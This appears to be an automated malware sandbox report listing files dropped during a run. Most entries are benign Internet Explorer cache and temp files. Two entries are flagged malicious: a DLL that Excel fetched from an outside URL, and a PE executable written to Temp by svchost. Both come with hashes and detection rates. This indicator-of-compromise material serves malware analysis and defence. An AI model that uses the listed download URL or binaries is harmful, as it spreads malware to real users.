                                                                                                                                      SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/bullet.png
                                                                                                                                      Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\J7EK2SLI\http_404[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):6495
                                                                                                                                      Entropy (8bit):3.8998802417135856
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                      SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                      SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                      SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\J7EK2SLI\http_404[2]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):6495
                                                                                                                                      Entropy (8bit):3.8998802417135856
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                      SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                      SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                      SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/http_404.htm
                                                                                                                                      Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\J7EK2SLI\info_48[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Size (bytes):4113
                                                                                                                                      Entropy (8bit):7.9370830126943375
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                      SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                      SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                      SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dll
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Size (bytes):375808
                                                                                                                                      Entropy (8bit):4.732447683360025
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:7E9C8822BE0F73073CE2CC5EF5A13C96
                                                                                                                                      SHA1:10B2F8667DB53EAF1B85A209D9B80B834425167F
                                                                                                                                      SHA-256:BD6840CC208517847E130DB0C847E715BA80A88E210E6383B37C1D0381877EE5
                                                                                                                                      SHA-512:120BFEC74EED70DC19D7AFF9ED8DC392616A6C652F4C7B3F642219C6D5203038E66CEF65E67B79041B8653B65021E2402B3CFC0F3B6850AFD1D13E2A03637118
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: Virustotal, Detection: 48%, Browse
                                                                                                                                      • Antivirus: Metadefender, Detection: 16%, Browse
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                      IE Cache URL:http://mac-rail.com/434.dll
                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....$._...........!...2."...........3.......@..........................................................................................t.......................P......................................................$...........................o................................... ..`.text........0...................... ..`.rdata.......@.......&..............@..@.rdata2. N...P...P...(..............@..@.data....3.......4...x..............@....rsrc...t...........................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\background_gradient[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                      Size (bytes):453
                                                                                                                                      Entropy (8bit):5.019973044227213
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                      SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                      SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                      SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\httpErrorPagesScripts[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Size (bytes):12105
                                                                                                                                      Entropy (8bit):5.451485481468043
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:9234071287E637F85D721463C488704C
                                                                                                                                      SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                      SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                      SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\info_48[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Size (bytes):4113
                                                                                                                                      Entropy (8bit):7.9370830126943375
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                      SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                      SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                      SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/info_48.png
                                                                                                                                      Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WHTRT9VA\background_gradient[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                      Size (bytes):453
                                                                                                                                      Entropy (8bit):5.019973044227213
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                      SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                      SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                      SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/background_gradient.jpg
                                                                                                                                      Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WHTRT9VA\down[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                      Size (bytes):748
                                                                                                                                      Entropy (8bit):7.249606135668305
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                      SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                      SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                      SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WHTRT9VA\errorPageStrings[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Size (bytes):4720
                                                                                                                                      Entropy (8bit):5.164796203267696
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                      SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                      SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                      SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WHTRT9VA\httpErrorPagesScripts[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Size (bytes):12105
                                                                                                                                      Entropy (8bit):5.451485481468043
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:9234071287E637F85D721463C488704C
                                                                                                                                      SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                      SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                      SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                                                                                                                                      Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                      C:\Users\user\AppData\Local\Temp\BN6D10.tmp
                                                                                                                                      Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Size (bytes):145920
                                                                                                                                      Entropy (8bit):6.592747566807753
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:5105430437588F8878DA6957BC8C3119
                                                                                                                                      SHA1:818651E37EF71701165C3EB03C5C1813C1047B32
                                                                                                                                      SHA-256:D5CCF9039136D23649240CD3879F6E9D40DAE0DFF2A5CFCDEFC8535F93587C38
                                                                                                                                      SHA-512:3149A53BC48FEEA00CE6067CF5BBE94AE5B65E933FFDD5AE4139D217C2E7E7E65FA636AB021D9A374E091A791C952E6F995E6CB923DDBFCC33D4D1E575E528B1
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: Virustotal, Detection: 42%, Browse
                                                                                                                                      • Antivirus: Metadefender, Detection: 14%, Browse
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T&A..G/..G/..G/......G/.....}G/.....>G/.7.T..G/..G..mG/......G/......G/......G/.Rich.G/.................PE..L....zD\...........................j@............@.............................................................................<....@...C..............................................................................d............................text............................... ..`.rdata...........0..................@..@.data....!..........................@....rsrc....C...@...D..................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\F8A20000
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Size (bytes):43246
                                                                                                                                      Entropy (8bit):7.807914423083856
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:0E48389924E22DF71560B7AEB0304E5F
                                                                                                                                      SHA1:2AE428499E9A315BCFC7544EFF1F1A199962FE2C
                                                                                                                                      SHA-256:0C528AC1FCEE3A1ACDED25C313F5BD9488A259B90F8B01C7F18527D08C648F82
                                                                                                                                      SHA-512:0AE1FA520CFE7AF756DE8F0F6D3DC62AE78974514EEF8A8F31952D8A995DFF1499087F97FAD8F8D4938D74EB3B888208130179CB0F4C4AA67F586701A40A6EAD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .TIO.0..#.."_Q....=5..r.$x?`...Uo..h.....,j.*.$..-3...........[q.D.^.m.....o.sQQ......X"......q..*F{jE.s.+%...P."z>... .2.d.5.....T.g...CL.W8.g....o..D?....^.j.q._..VDBK_ ..5.2.&_...^{j....D:a.;...gO...;Nf2..{H...;..+_C.?.0o.....j\(..u..q.R...d....7.;...=.d.:=D..= S.:T.s].a:5.uP......t..l.....P......BO3 Hyi....C.]..)w.P?......>r....^.....y..D.t.L.S...#........#.a..7...6...?..XF.F.E[..t........PK..........!................[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H.......BKwAH.
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF6B6FCA8DB4379CC7.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Size (bytes):12933
                                                                                                                                      Entropy (8bit):0.40904041303520716
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:AA92DAB05C4E12C57362C47A01368998
                                                                                                                                      SHA1:ECBC32BED57B2B138484717670BD2855E4BD6B62
                                                                                                                                      SHA-256:65783A35659511478A7E1D4DA5E265FDF2B34ACF11CB1DEF080DB21F94F8072C
                                                                                                                                      SHA-512:AB38D247C68FE5F5601B32D3B901D8B8472933853C6DA613AC51113A7A693835535F938F57FD12ADB3FACEC73F04E2CD4476CFAAAB28399EEA54A775A652AAF8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF883191F39C641F79.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Size (bytes):40105
                                                                                                                                      Entropy (8bit):0.6609004523979412
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:70538966A16EE1AFD9F051D1C44915B2
                                                                                                                                      SHA1:9752DA951D1F075D0D0BD0A04080F0B04755B235
                                                                                                                                      SHA-256:D8A45E8E72D05A47D90D7B4F60A86933F101CC2FF7E27C3C50A2C0A43A3FBA24
                                                                                                                                      SHA-512:1501E0C14650553D0B5599C260B84EFFD006AEB9AB3FDC6A2BE1794BBA91CE14F9B13FD5561BAAAE51E44B395F879B243BDBEB22E75C56EE9488D0CE01B88444
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DFB94340AE922C5B1E.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Size (bytes):12933
                                                                                                                                      Entropy (8bit):0.40393103847666595
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:0E00D70CDF82AE957E291EAD5C006B87
                                                                                                                                      SHA1:F93DCB1D6E9D70E8A49295AF9F0E766FD000D3E1
                                                                                                                                      SHA-256:B3139543FE0671E3E57E5A0E9FE66BBBBDB23D2A9F43CEB1057256F14F6E659B
                                                                                                                                      SHA-512:B09EE8A1E81D5601224426DB854D2651C262E115FE611A4FB4616DC131A4000E0380FDF19AFC7B5F3FA04E192B14164A6E64B8BB0A716AA0D6646C1A27F8C26B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DFE8090ABB1C886A57.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Size (bytes):40105
                                                                                                                                      Entropy (8bit):0.6626251679986942
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:859092B3A560607B5AC942652BBE7FAD
                                                                                                                                      SHA1:38B2B6DE9360AA733C52236E3B6EF211BBB8ED4A
                                                                                                                                      SHA-256:B8CDFCDFEEF0155CFD038F383AE0AC6E4F7E86B78FC3AF5BDCF5085F78B634FB
                                                                                                                                      SHA-512:ACC0D0B27A5D5D984D72F2EF3C597CA61DE0E26B52D69B85F186988FA44A68018B2AF6BEB7F9C024F01C5275C0BD40F1CFF00183F5F99DD4D407E1D0C4A04F30
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu May 23 21:41:59 2019, mtime=Tue Jul 14 08:20:22 2020, atime=Tue Jul 14 08:20:22 2020, length=12288, window=hide
                                                                                                                                      Size (bytes):363
                                                                                                                                      Entropy (8bit):4.4095455826050145
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:0B4922DC2DD64AEE559735C458F987E0
                                                                                                                                      SHA1:F7D5023D17E735F8FBCD71EA0F08754B9047AE52
                                                                                                                                      SHA-256:D65A8ED30B86CC638B2552249EBEBD488A39E1F2CD3EDC67AF6BB506A3A9C3B1
                                                                                                                                      SHA-512:CB2C6B56A40015AFB7F67153D9D8BB3D58D280B95402AC9784E72D57B7C31112C160692920E3CDF0CF268CA9676DF170E15409C774EAABAFEC27D27AD43BF248
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: L..................F.........<Z.....:&j..Y...I..Y...0..........................D...............-.......C...........m..Z.....C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.`.......X.......841618..............x..C..Z.;....i.}..............x..C..Z.;....i.}..........E.......9...1SPS..mD..pH.H@..=x.....h....H....X/:......`"................
                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Size (bytes):65
                                                                                                                                      Entropy (8bit):4.16181862888157
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:C01ED866B58D9C823D8E07646FEC533F
                                                                                                                                      SHA1:59F55033ABC2C5751B2E285ECDA2440BB6D68C6A
                                                                                                                                      SHA-256:3BCF37C7FBAEF839CD88F747A709979AD204AC799B743C38C9E221DE78454886
                                                                                                                                      SHA-512:019E897B3762767A733C2723E49B4A886D5EC198EEB9AC42B8675139F8A7E9B290D632EBE314C9E0BD2C26B69A7174FE2B7437860244D5EB88261161053FA5EB
                                                                                                                                      Malicious:false
